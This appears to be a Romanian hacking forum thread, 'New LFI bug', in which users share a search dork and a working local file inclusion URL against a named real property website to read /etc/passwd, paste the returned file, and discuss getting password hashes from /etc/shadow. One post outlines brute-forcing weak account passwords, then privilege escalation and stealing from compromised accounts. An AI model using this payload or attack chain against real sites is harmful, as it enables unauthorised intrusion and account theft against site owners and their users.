New LFI bug

[zbeng]

dork: Developed by : Irbosol Group - SGPS.

bug: /index.php?body=../../../../../../../../etc/passwd

http://www.algarveproperties.net//index.php?body=../../../../../../../../etc/passwd

nu e gasit de mine

[hackedss]

asa man ... si cand dau pe alea si gasesc cam asa .. une exemplu

unde il scriu

/root:/bin/bash

[nullbyte]

zbeng, parolele sunt in shadow...

[Guest BanKai]

lol mai fetelor lfi are cu totul alta intrebuintzare nusa citesti passwd sau shadow asta e un exemplu pe care toata lumea il foloseste pentru ca /etc/passwd are orice unix .

[bossjuan]

daca imi apare asda cum facsa aflu parola mai departe

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync

[nullbyte]

daca imi apare asda cum facsa aflu parola mai departe

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync

AM SCRIS CA PAROLELE SE AFLA IN /shadow si nu ai sanse. Mai citeste si jos, nu doar primul post :evil: :evil:

[x.o]

daca imi apare asda cum facsa aflu parola mai departe

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync

AM SCRIS CA PAROLELE SE AFLA IN /shadow si nu ai sanse. Mai citeste si jos, nu doar primul post :evil: :evil:

+ tre drepturi de root pentru a putea afisa shadow

[moubik]

/etc/passwd e pt pustanii care afla ce conturi sunt acolo, fara sa afle practic parolele sau hashurile si pe urma fac ei faza cu programel care face bruteforce pe toate conturile si gasesc 1-2-3-4 conturi cu parole unsafe.

dupa care poti sa incerci un privilege escalation sau exploit local, sau sa furi ceva din contu ala.

uite o idee ....